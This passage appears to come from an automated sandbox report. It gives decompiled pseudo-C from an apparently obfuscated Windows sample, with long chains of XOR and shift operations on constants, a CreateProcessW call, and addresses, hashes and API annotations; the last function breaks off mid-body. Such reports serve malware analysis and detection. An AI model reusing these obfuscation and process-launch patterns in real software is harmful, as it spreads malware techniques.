                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x00e8652f;
                                                                                                                                                                                                                    				E00A7E554(0xa45f1f5c, 0x9f993dc3, 0x61);
                                                                                                                                                                                                                    				_t40 = CreateProcessW(_t48, _a44, 0, 0, _a12, 0, 0, 0, _a40, _a60); // executed
                                                                                                                                                                                                                    				return _t40;
                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                    0x00a7a34a
                                                                                                                                                                                                                    0x00a7a34f
                                                                                                                                                                                                                    0x00a7a351
                                                                                                                                                                                                                    0x00a7a354
                                                                                                                                                                                                                    0x00a7a357
                                                                                                                                                                                                                    0x00a7a358
                                                                                                                                                                                                                    0x00a7a35b
                                                                                                                                                                                                                    0x00a7a35e
                                                                                                                                                                                                                    0x00a7a35f
                                                                                                                                                                                                                    0x00a7a360
                                                                                                                                                                                                                    0x00a7a363
                                                                                                                                                                                                                    0x00a7a364
                                                                                                                                                                                                                    0x00a7a367
                                                                                                                                                                                                                    0x00a7a368
                                                                                                                                                                                                                    0x00a7a36b
                                                                                                                                                                                                                    0x00a7a36e
                                                                                                                                                                                                                    0x00a7a372
                                                                                                                                                                                                                    0x00a7a373
                                                                                                                                                                                                                    0x00a7a378
                                                                                                                                                                                                                    0x00a7a381
                                                                                                                                                                                                                    0x00a7a384
                                                                                                                                                                                                                    0x00a7a390
                                                                                                                                                                                                                    0x00a7a39b
                                                                                                                                                                                                                    0x00a7a39e
                                                                                                                                                                                                                    0x00a7a3a5
                                                                                                                                                                                                                    0x00a7a3ac
                                                                                                                                                                                                                    0x00a7a3b3
                                                                                                                                                                                                                    0x00a7a3c7
                                                                                                                                                                                                                    0x00a7a3e1
                                                                                                                                                                                                                    0x00a7a3e8

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00E77ED2,00000000,00000000,00000000,?,?), ref: 00A7A3E1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                                                                                    • String ID: /e
                                                                                                                                                                                                                    • API String ID: 963392458-4252541474
                                                                                                                                                                                                                    • Opcode ID: 495cc109e5d6bacb0bf9c9752aa838be4aea0d45c222a50da2587a216de52034
                                                                                                                                                                                                                    • Instruction ID: e72379b9dc92eef209256b6ba3191092fec7d08ebfbed1c284ad33fa156d74a5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 495cc109e5d6bacb0bf9c9752aa838be4aea0d45c222a50da2587a216de52034
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25111932900148BBCF219F96DC09CDF7FBAEFCA714F049148FA1866160D3728A60DBA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E00A76D52() {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_v12 = 0x201161;
                                                                                                                                                                                                                    				_v12 = _v12 + 0xb36a;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x00247f79;
                                                                                                                                                                                                                    				_v8 = 0x239e7a;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xf99c9d58;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xf9b97f3c;
                                                                                                                                                                                                                    				E00A7E554(0xa45f1f5c, 0xab0622b6, 0x50);
                                                                                                                                                                                                                    				ExitProcess(0);
                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                    0x00a76d57
                                                                                                                                                                                                                    0x00a76d5e
                                                                                                                                                                                                                    0x00a76d65
                                                                                                                                                                                                                    0x00a76d6c
                                                                                                                                                                                                                    0x00a76d73
                                                                                                                                                                                                                    0x00a76d7a
                                                                                                                                                                                                                    0x00a76d94
                                                                                                                                                                                                                    0x00a76d9e

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 00A76D9E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                                                    • Opcode ID: a122b493867602417b930f0a9de268a3edaec180e64286864dbfbe39b7f241e0
                                                                                                                                                                                                                    • Instruction ID: e71c61f36567ce37af434382044767d6ccf1754643005390317b47dbc95a4a37
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a122b493867602417b930f0a9de268a3edaec180e64286864dbfbe39b7f241e0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36E039B0921308BBDB48CBD59D46A9EBBB4AB04309F2080C8E60976290E7B11B549A62
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                    			E00A66877(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                    				int _t32;
                                                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                                                    				WCHAR* _t40;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_t40 = __edx;
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				E00A7C6D8(_t24);
                                                                                                                                                                                                                    				_v12 = 0xf4ca38;
                                                                                                                                                                                                                    				_v12 = _v12 >> 0xd;
                                                                                                                                                                                                                    				_t34 = 5;
                                                                                                                                                                                                                    				_v12 = _v12 / _t34;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0006577f;
                                                                                                                                                                                                                    				_v8 = 0xa9d358;
                                                                                                                                                                                                                    				_v8 = _v8 | 0xbfd8fadd;
                                                                                                                                                                                                                    				_v8 = _v8 * 0x27;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x3f164cd7;
                                                                                                                                                                                                                    				E00A7E554(0xa45f1f5c, 0x9f092728, 0x18e);
                                                                                                                                                                                                                    				_t32 = lstrcmpiW(_t40, _a8); // executed
                                                                                                                                                                                                                    				return _t32;
                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                    0x00a6687d
                                                                                                                                                                                                                    0x00a66880
                                                                                                                                                                                                                    0x00a66882
                                                                                                                                                                                                                    0x00a66885
                                                                                                                                                                                                                    0x00a66887
                                                                                                                                                                                                                    0x00a6688c
                                                                                                                                                                                                                    0x00a66895
                                                                                                                                                                                                                    0x00a6689e
                                                                                                                                                                                                                    0x00a668a9
                                                                                                                                                                                                                    0x00a668ac
                                                                                                                                                                                                                    0x00a668b3
                                                                                                                                                                                                                    0x00a668ba
                                                                                                                                                                                                                    0x00a668cf
                                                                                                                                                                                                                    0x00a668d2
                                                                                                                                                                                                                    0x00a668df
                                                                                                                                                                                                                    0x00a668eb
                                                                                                                                                                                                                    0x00a668f1

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrcmpiW.KERNELBASE(?,?), ref: 00A668EB
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrcmpi
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1586166983-0
                                                                                                                                                                                                                    • Opcode ID: 3dd7cf760ab25b67abe97c2f97cbaf0e2bbca96cc917130f8850b1ae82fa3993
                                                                                                                                                                                                                    • Instruction ID: bed077526c3b69417a334adad4416467864c0824526927e9613f5f1099843c19
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3dd7cf760ab25b67abe97c2f97cbaf0e2bbca96cc917130f8850b1ae82fa3993
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98014B3590120CFBDB08DF90DD468DEBFB9EB45314F20C199E8186B210D7715B60AB91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                    			E00A67990(intOrPtr __ecx) {
                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				char _v64;
                                                                                                                                                                                                                    				char* _v68;
                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                    				char _v84;
                                                                                                                                                                                                                    				char _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                    				signed int _v104;
                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                    				signed int _v112;
                                                                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                                                                    				signed int _v120;
                                                                                                                                                                                                                    				signed int _v124;
                                                                                                                                                                                                                    				signed int _v128;
                                                                                                                                                                                                                    				signed int _v132;
                                                                                                                                                                                                                    				signed int _v136;
                                                                                                                                                                                                                    				signed int _v140;
                                                                                                                                                                                                                    				signed int _v144;
                                                                                                                                                                                                                    				signed int _v148;
                                                                                                                                                                                                                    				signed int _v152;
                                                                                                                                                                                                                    				signed int _v156;
                                                                                                                                                                                                                    				signed int _v160;
                                                                                                                                                                                                                    				signed int _v164;
                                                                                                                                                                                                                    				signed int _v168;
                                                                                                                                                                                                                    				signed int _v172;
                                                                                                                                                                                                                    				signed int _v176;
                                                                                                                                                                                                                    				signed int _v180;
                                                                                                                                                                                                                    				signed int _v184;
                                                                                                                                                                                                                    				signed int _v188;
                                                                                                                                                                                                                    				signed int _v192;
                                                                                                                                                                                                                    				signed int _v196;
                                                                                                                                                                                                                    				signed int _v200;
                                                                                                                                                                                                                    				signed int _v204;
                                                                                                                                                                                                                    				signed int _v208;
                                                                                                                                                                                                                    				signed int _v212;
                                                                                                                                                                                                                    				signed int _v216;
                                                                                                                                                                                                                    				signed int _v220;
                                                                                                                                                                                                                    				signed int _v224;
                                                                                                                                                                                                                    				signed int _v228;
                                                                                                                                                                                                                    				signed int _v232;
                                                                                                                                                                                                                    				signed int _v236;
                                                                                                                                                                                                                    				signed int _v240;
                                                                                                                                                                                                                    				signed int _v244;
                                                                                                                                                                                                                    				signed int _v248;
                                                                                                                                                                                                                    				signed int _v252;
                                                                                                                                                                                                                    				signed int _v256;
                                                                                                                                                                                                                    				signed int _v260;
                                                                                                                                                                                                                    				signed int _v264;
                                                                                                                                                                                                                    				signed int _v268;
                                                                                                                                                                                                                    				signed int _v272;
                                                                                                                                                                                                                    				signed int _v276;
                                                                                                                                                                                                                    				signed int _v280;
                                                                                                                                                                                                                    				signed int _v284;
                                                                                                                                                                                                                    				signed int _v288;
                                                                                                                                                                                                                    				signed int _v292;
                                                                                                                                                                                                                    				signed int _v296;
                                                                                                                                                                                                                    				signed int _v300;
                                                                                                                                                                                                                    				signed int _v304;
                                                                                                                                                                                                                    				signed int _v308;
                                                                                                                                                                                                                    				signed int _v312;
                                                                                                                                                                                                                    				unsigned int _v316;
                                                                                                                                                                                                                    				signed int _v320;
                                                                                                                                                                                                                    				signed int _v324;
                                                                                                                                                                                                                    				signed int _v328;
                                                                                                                                                                                                                    				signed int _v332;
                                                                                                                                                                                                                    				signed int _v336;
                                                                                                                                                                                                                    				signed int _v340;
                                                                                                                                                                                                                    				signed int _v344;
                                                                                                                                                                                                                    				signed int _v348;
                                                                                                                                                                                                                    				signed int _v352;
                                                                                                                                                                                                                    				signed int _v356;
                                                                                                                                                                                                                    				signed int _v360;
                                                                                                                                                                                                                    				signed int _v364;
                                                                                                                                                                                                                    				signed int _v368;
                                                                                                                                                                                                                    				signed int _v372;
                                                                                                                                                                                                                    				signed int _v376;
                                                                                                                                                                                                                    				signed int _v380;
                                                                                                                                                                                                                    				signed int _v384;
                                                                                                                                                                                                                    				signed int _v388;
                                                                                                                                                                                                                    				signed int _v392;
                                                                                                                                                                                                                    				signed int _v396;
                                                                                                                                                                                                                    				signed int _v400;
                                                                                                                                                                                                                    				signed int _v404;
                                                                                                                                                                                                                    				signed int _v408;
                                                                                                                                                                                                                    				signed int _v412;
                                                                                                                                                                                                                    				signed int _v416;
                                                                                                                                                                                                                    				signed int _v420;
                                                                                                                                                                                                                    				signed int _v424;
                                                                                                                                                                                                                    				signed int _v428;
                                                                                                                                                                                                                    				signed int _v432;
                                                                                                                                                                                                                    				signed int _v436;
                                                                                                                                                                                                                    				signed int _v440;
                                                                                                                                                                                                                    				signed int _v444;
                                                                                                                                                                                                                    				signed int _v448;
                                                                                                                                                                                                                    				signed int _v452;
                                                                                                                                                                                                                    				void* _t935;
                                                                                                                                                                                                                    				intOrPtr _t951;
                                                                                                                                                                                                                    				void* _t952;
                                                                                                                                                                                                                    				signed int _t954;
                                                                                                                                                                                                                    				void* _t965;
                                                                                                                                                                                                                    				void* _t980;
                                                                                                                                                                                                                    				void* _t982;
                                                                                                                                                                                                                    				signed int _t987;
                                                                                                                                                                                                                    				signed int _t988;
                                                                                                                                                                                                                    				signed int _t989;
                                                                                                                                                                                                                    				signed int _t990;
                                                                                                                                                                                                                    				signed int _t991;
                                                                                                                                                                                                                    				signed int _t992;
                                                                                                                                                                                                                    				signed int _t993;
                                                                                                                                                                                                                    				signed int _t994;
                                                                                                                                                                                                                    				signed int _t995;
                                                                                                                                                                                                                    				signed int _t996;
                                                                                                                                                                                                                    				signed int _t997;
                                                                                                                                                                                                                    				signed int _t998;
                                                                                                                                                                                                                    				signed int _t999;
                                                                                                                                                                                                                    				signed int _t1000;
                                                                                                                                                                                                                    				signed int _t1001;
                                                                                                                                                                                                                    				signed int _t1002;
                                                                                                                                                                                                                    				signed int _t1003;
                                                                                                                                                                                                                    				signed int _t1004;
                                                                                                                                                                                                                    				signed int _t1005;
                                                                                                                                                                                                                    				void* _t1006;
                                                                                                                                                                                                                    				intOrPtr _t1008;
                                                                                                                                                                                                                    				char _t1030;
                                                                                                                                                                                                                    				void* _t1079;
                                                                                                                                                                                                                    				void* _t1098;
                                                                                                                                                                                                                    				intOrPtr _t1099;
                                                                                                                                                                                                                    				signed int _t1101;
                                                                                                                                                                                                                    				void* _t1106;
                                                                                                                                                                                                                    				signed int* _t1108;
                                                                                                                                                                                                                    				void* _t1114;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t1108 =  &_v452;
                                                                                                                                                                                                                    				_v52 = 0x428483;
                                                                                                                                                                                                                    				_t1106 = 0;
                                                                                                                                                                                                                    				_v80 = __ecx;
                                                                                                                                                                                                                    				_v48 = _v48 & 0;
                                                                                                                                                                                                                    				_t982 = 0x4a48a54;
                                                                                                                                                                                                                    				_v376 = 0x8c99ec;
                                                                                                                                                                                                                    				_v376 = _v376 + 0xffff4a5d;
                                                                                                                                                                                                                    				_v376 = _v376 ^ 0x637fb58d;
                                                                                                                                                                                                                    				_t1101 = 0x41;
                                                                                                                                                                                                                    				_v376 = _v376 * 0x14;
                                                                                                                                                                                                                    				_v376 = _v376 ^ 0x8254271b;
                                                                                                                                                                                                                    				_v280 = 0x1553bb;
                                                                                                                                                                                                                    				_v280 = _v280 >> 0xc;
                                                                                                                                                                                                                    				_v280 = _v280 ^ 0xa08a18e1;
                                                                                                                                                                                                                    				_v280 = _v280 ^ 0xa08a19b5;
                                                                                                                                                                                                                    				_v180 = 0x25805b;
                                                                                                                                                                                                                    				_t987 = 0x79;
                                                                                                                                                                                                                    				_v180 = _v180 * 0x66;
                                                                                                                                                                                                                    				_v180 = _v180 ^ 0x0ef12442;
                                                                                                                                                                                                                    				_v388 = 0xcd36cc;
                                                                                                                                                                                                                    				_v388 = _v388 + 0xffff7485;
                                                                                                                                                                                                                    				_v388 = _v388 ^ 0x4824d38a;
                                                                                                                                                                                                                    				_v388 = _v388 << 0xf;
                                                                                                                                                                                                                    				_v388 = _v388 ^ 0x3c6d8000;
                                                                                                                                                                                                                    				_v364 = 0xd05173;
                                                                                                                                                                                                                    				_v364 = _v364 ^ 0xb8e4e3ca;
                                                                                                                                                                                                                    				_v364 = _v364 >> 0xd;
                                                                                                                                                                                                                    				_v364 = _v364 / _t1101;
                                                                                                                                                                                                                    				_v364 = _v364 ^ 0x000016ab;
                                                                                                                                                                                                                    				_v164 = 0xeb15de;
                                                                                                                                                                                                                    				_v164 = _v164 | 0x810382d9;
                                                                                                                                                                                                                    				_v164 = _v164 ^ 0x81eb97df;
                                                                                                                                                                                                                    				_v156 = 0x405a86;
                                                                                                                                                                                                                    				_v156 = _v156 * 0x54;
                                                                                                                                                                                                                    				_v156 = _v156 ^ 0x151db3f8;
                                                                                                                                                                                                                    				_v140 = 0x49dfe8;
                                                                                                                                                                                                                    				_v140 = _v140 << 0xc;
                                                                                                                                                                                                                    				_v140 = _v140 ^ 0x9dfe8000;
                                                                                                                                                                                                                    				_v192 = 0xc93094;
                                                                                                                                                                                                                    				_v192 = _v192 << 3;
                                                                                                                                                                                                                    				_v192 = _v192 ^ 0x064984a0;
                                                                                                                                                                                                                    				_v264 = 0x231568;
                                                                                                                                                                                                                    				_v264 = _v264 << 0xb;
                                                                                                                                                                                                                    				_v264 = _v264 / _t987;
                                                                                                                                                                                                                    				_v264 = _v264 ^ 0x00343130;
                                                                                                                                                                                                                    				_v152 = 0xd1496b;
                                                                                                                                                                                                                    				_v152 = _v152 >> 5;
                                                                                                                                                                                                                    				_v152 = _v152 ^ 0x00068a4b;
                                                                                                                                                                                                                    				_v300 = 0x71b62;
                                                                                                                                                                                                                    				_v300 = _v300 >> 0xb;
                                                                                                                                                                                                                    				_v300 = _v300 >> 2;
                                                                                                                                                                                                                    				_t988 = 0x55;
                                                                                                                                                                                                                    				_v300 = _v300 * 0x12;
                                                                                                                                                                                                                    				_v300 = _v300 ^ 0x000003f0;
                                                                                                                                                                                                                    				_v452 = 0x31fcaa;
                                                                                                                                                                                                                    				_v452 = _v452 + 0xeffc;
                                                                                                                                                                                                                    				_v452 = _v452 + 0x818d;
                                                                                                                                                                                                                    				_v452 = _v452 + 0xd688;
                                                                                                                                                                                                                    				_v452 = _v452 ^ 0x0034449b;
                                                                                                                                                                                                                    				_v420 = 0x568e5d;
                                                                                                                                                                                                                    				_v420 = _v420 >> 0xd;
                                                                                                                                                                                                                    				_v420 = _v420 / _t988;
                                                                                                                                                                                                                    				_v420 = _v420 ^ 0xba8265f0;
                                                                                                                                                                                                                    				_v420 = _v420 ^ 0xba8d43ca;
                                                                                                                                                                                                                    				_v232 = 0xefc393;
                                                                                                                                                                                                                    				_v232 = _v232 >> 9;
                                                                                                                                                                                                                    				_v232 = _v232 ^ 0xf7ab169e;
                                                                                                                                                                                                                    				_v232 = _v232 ^ 0xf7a199e5;
                                                                                                                                                                                                                    				_v240 = 0xeedf8a;
                                                                                                                                                                                                                    				_v240 = _v240 ^ 0xedaf5abc;
                                                                                                                                                                                                                    				_v240 = _v240 >> 3;
                                                                                                                                                                                                                    				_v240 = _v240 ^ 0x1daf94be;
                                                                                                                                                                                                                    				_v428 = 0x7564b7;
                                                                                                                                                                                                                    				_v428 = _v428 << 2;
                                                                                                                                                                                                                    				_v428 = _v428 + 0xffff9954;
                                                                                                                                                                                                                    				_v428 = _v428 ^ 0xfa3ecf08;
                                                                                                                                                                                                                    				_v428 = _v428 ^ 0xfbe9e1b6;
                                                                                                                                                                                                                    				_v404 = 0x6f4bbf;
                                                                                                                                                                                                                    				_v404 = _v404 >> 6;
                                                                                                                                                                                                                    				_t989 = 0xa;
                                                                                                                                                                                                                    				_v404 = _v404 / _t989;
                                                                                                                                                                                                                    				_v404 = _v404 + 0xffff66d1;
                                                                                                                                                                                                                    				_v404 = _v404 ^ 0xfff4369a;
                                                                                                                                                                                                                    				_v224 = 0x7c3b59;
                                                                                                                                                                                                                    				_t152 =  &_v224; // 0x7c3b59
                                                                                                                                                                                                                    				_t990 = 0x28;
                                                                                                                                                                                                                    				_v224 =  *_t152 * 0x14;
                                                                                                                                                                                                                    				_v224 = _v224 | 0xef115cd8;
                                                                                                                                                                                                                    				_v224 = _v224 ^ 0xefb0ada6;
                                                                                                                                                                                                                    				_v412 = 0x36969e;
                                                                                                                                                                                                                    				_v412 = _v412 / _t990;
                                                                                                                                                                                                                    				_v412 = _v412 + 0xbc31;
                                                                                                                                                                                                                    				_t991 = 0x6f;
                                                                                                                                                                                                                    				_v412 = _v412 * 0x58;
                                                                                                                                                                                                                    				_v412 = _v412 ^ 0x00b7ebef;
                                                                                                                                                                                                                    				_v136 = 0xffd87a;
                                                                                                                                                                                                                    				_v136 = _v136 >> 0xf;
                                                                                                                                                                                                                    				_v136 = _v136 ^ 0x000eb7c4;
                                                                                                                                                                                                                    				_v372 = 0xa7139c;
                                                                                                                                                                                                                    				_v372 = _v372 | 0x1aa3fb75;
                                                                                                                                                                                                                    				_v372 = _v372 + 0xfbc5;
                                                                                                                                                                                                                    				_v372 = _v372 ^ 0x5678117d;
                                                                                                                                                                                                                    				_v372 = _v372 ^ 0x4cda791d;
                                                                                                                                                                                                                    				_v380 = 0x3da533;
                                                                                                                                                                                                                    				_v380 = _v380 + 0xffffb169;
                                                                                                                                                                                                                    				_v380 = _v380 + 0xffff1483;
                                                                                                                                                                                                                    				_v380 = _v380 / _t991;
                                                                                                                                                                                                                    				_v380 = _v380 ^ 0x0009a8bf;
                                                                                                                                                                                                                    				_v396 = 0xec8b13;
                                                                                                                                                                                                                    				_t992 = 0x5b;
                                                                                                                                                                                                                    				_v396 = _v396 * 0x38;
                                                                                                                                                                                                                    				_v396 = _v396 << 0xc;
                                                                                                                                                                                                                    				_v396 = _v396 | 0x111cb619;
                                                                                                                                                                                                                    				_v396 = _v396 ^ 0xf7de41eb;
                                                                                                                                                                                                                    				_v128 = 0xffca38;
                                                                                                                                                                                                                    				_v128 = _v128 >> 0xc;
                                                                                                                                                                                                                    				_v128 = _v128 ^ 0x0006748e;
                                                                                                                                                                                                                    				_v348 = 0xdc87ce;
                                                                                                                                                                                                                    				_v348 = _v348 / _t992;
                                                                                                                                                                                                                    				_v348 = _v348 ^ 0x2f260d1d;
                                                                                                                                                                                                                    				_v348 = _v348 << 0xb;
                                                                                                                                                                                                                    				_v348 = _v348 ^ 0x230261af;
                                                                                                                                                                                                                    				_v356 = 0x24c8ce;
                                                                                                                                                                                                                    				_v356 = _v356 + 0x11fc;
                                                                                                                                                                                                                    				_t993 = 0x2f;
                                                                                                                                                                                                                    				_v356 = _v356 / _t993;
                                                                                                                                                                                                                    				_v356 = _v356 + 0xffffdfe5;
                                                                                                                                                                                                                    				_v356 = _v356 ^ 0x000d2caf;
                                                                                                                                                                                                                    				_v324 = 0xe65bf6;
                                                                                                                                                                                                                    				_v324 = _v324 + 0x6131;
                                                                                                                                                                                                                    				_t994 = 0x48;
                                                                                                                                                                                                                    				_v324 = _v324 * 0x42;
                                                                                                                                                                                                                    				_v324 = _v324 + 0xffff2f5f;
                                                                                                                                                                                                                    				_v324 = _v324 ^ 0x3b73a1b8;
                                                                                                                                                                                                                    				_v332 = 0x6c07cd;
                                                                                                                                                                                                                    				_v332 = _v332 + 0xffff67ed;
                                                                                                                                                                                                                    				_v332 = _v332 ^ 0x7dc02acd;
                                                                                                                                                                                                                    				_v332 = _v332 * 0x65;
                                                                                                                                                                                                                    				_v332 = _v332 ^ 0x9496ca94;
                                                                                                                                                                                                                    				_v340 = 0xd12be;
                                                                                                                                                                                                                    				_v340 = _v340 + 0xffffed8d;
                                                                                                                                                                                                                    				_v340 = _v340 << 6;
                                                                                                                                                                                                                    				_v340 = _v340 >> 0xf;
                                                                                                                                                                                                                    				_v340 = _v340 ^ 0x00037f3d;
                                                                                                                                                                                                                    				_v188 = 0x3f8077;
                                                                                                                                                                                                                    				_v188 = _v188 << 4;
                                                                                                                                                                                                                    				_v188 = _v188 ^ 0x03fe7f60;
                                                                                                                                                                                                                    				_v244 = 0x28fb4d;
                                                                                                                                                                                                                    				_v244 = _v244 + 0xffff648b;
                                                                                                                                                                                                                    				_v244 = _v244 >> 0xf;
                                                                                                                                                                                                                    				_v244 = _v244 ^ 0x0002eef3;
                                                                                                                                                                                                                    				_v228 = 0xf54a41;
                                                                                                                                                                                                                    				_v228 = _v228 | 0xdec6e932;
                                                                                                                                                                                                                    				_v228 = _v228 << 3;
                                                                                                                                                                                                                    				_v228 = _v228 ^ 0xf7b3f5ca;
                                                                                                                                                                                                                    				_v100 = 0xd57e63;
                                                                                                                                                                                                                    				_v100 = _v100 * 0xd;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0x0ad1f05f;
                                                                                                                                                                                                                    				_v276 = 0x51df90;
                                                                                                                                                                                                                    				_v276 = _v276 >> 7;
                                                                                                                                                                                                                    				_v276 = _v276 ^ 0xa50e9f04;
                                                                                                                                                                                                                    				_v276 = _v276 ^ 0xa504826b;
                                                                                                                                                                                                                    				_v220 = 0x91db40;
                                                                                                                                                                                                                    				_v220 = _v220 >> 0xd;
                                                                                                                                                                                                                    				_v220 = _v220 | 0x01f5378b;
                                                                                                                                                                                                                    				_v220 = _v220 ^ 0x01f4de77;
                                                                                                                                                                                                                    				_v124 = 0xd0ad84;
                                                                                                                                                                                                                    				_v124 = _v124 + 0x6208;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0x00d0f82b;
                                                                                                                                                                                                                    				_v284 = 0xdcef83;
                                                                                                                                                                                                                    				_v284 = _v284 + 0xffffe488;
                                                                                                                                                                                                                    				_v284 = _v284 >> 0xd;
                                                                                                                                                                                                                    				_v284 = _v284 ^ 0x0008f0d0;
                                                                                                                                                                                                                    				_v268 = 0xe6c31e;
                                                                                                                                                                                                                    				_v268 = _v268 / _t994;
                                                                                                                                                                                                                    				_t995 = 0x7e;
                                                                                                                                                                                                                    				_v268 = _v268 / _t995;
                                                                                                                                                                                                                    				_v268 = _v268 ^ 0x0009d864;
                                                                                                                                                                                                                    				_v448 = 0xb84bcb;
                                                                                                                                                                                                                    				_v448 = _v448 << 0xf;
                                                                                                                                                                                                                    				_v448 = _v448 >> 4;
                                                                                                                                                                                                                    				_t996 = 0x50;
                                                                                                                                                                                                                    				_v448 = _v448 * 0x16;
                                                                                                                                                                                                                    				_v448 = _v448 ^ 0x341e8286;
                                                                                                                                                                                                                    				_v236 = 0x285901;
                                                                                                                                                                                                                    				_v236 = _v236 / _t996;
                                                                                                                                                                                                                    				_t997 = 0x3c;
                                                                                                                                                                                                                    				_v236 = _v236 * 0x4e;
                                                                                                                                                                                                                    				_v236 = _v236 ^ 0x00215a85;
                                                                                                                                                                                                                    				_v440 = 0xa6d530;
                                                                                                                                                                                                                    				_v440 = _v440 >> 2;
                                                                                                                                                                                                                    				_v440 = _v440 + 0xffff62a8;
                                                                                                                                                                                                                    				_v440 = _v440 / _t997;
                                                                                                                                                                                                                    				_v440 = _v440 ^ 0x000ada0c;
                                                                                                                                                                                                                    				_v92 = 0x677743;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x44b7e65b;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x44d7b8c1;
                                                                                                                                                                                                                    				_v116 = 0x7ca88a;
                                                                                                                                                                                                                    				_v116 = _v116 << 0xd;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0x9517039b;
                                                                                                                                                                                                                    				_v172 = 0xe6679;
                                                                                                                                                                                                                    				_v172 = _v172 ^ 0xcddbcf81;
                                                                                                                                                                                                                    				_v172 = _v172 ^ 0xcdd60192;
                                                                                                                                                                                                                    				_v196 = 0x4f520b;
                                                                                                                                                                                                                    				_v196 = _v196 + 0xffff7bfd;
                                                                                                                                                                                                                    				_v196 = _v196 ^ 0x004638b7;
                                                                                                                                                                                                                    				_v336 = 0x93fb81;
                                                                                                                                                                                                                    				_v336 = _v336 << 2;
                                                                                                                                                                                                                    				_v336 = _v336 >> 0xf;
                                                                                                                                                                                                                    				_v336 = _v336 << 0xf;
                                                                                                                                                                                                                    				_v336 = _v336 ^ 0x02408526;
                                                                                                                                                                                                                    				_v204 = 0xdd648f;
                                                                                                                                                                                                                    				_v204 = _v204 + 0x12f1;
                                                                                                                                                                                                                    				_v204 = _v204 ^ 0xd777a440;
                                                                                                                                                                                                                    				_v204 = _v204 ^ 0xd7a5c7f4;
                                                                                                                                                                                                                    				_v296 = 0xdde288;
                                                                                                                                                                                                                    				_v296 = _v296 ^ 0x7315415b;
                                                                                                                                                                                                                    				_v296 = _v296 >> 9;
                                                                                                                                                                                                                    				_v296 = _v296 ^ 0x003ae7f7;
                                                                                                                                                                                                                    				_v368 = 0x38db86;
                                                                                                                                                                                                                    				_v368 = _v368 ^ 0xc4b4e4b7;
                                                                                                                                                                                                                    				_v368 = _v368 / _t1101;
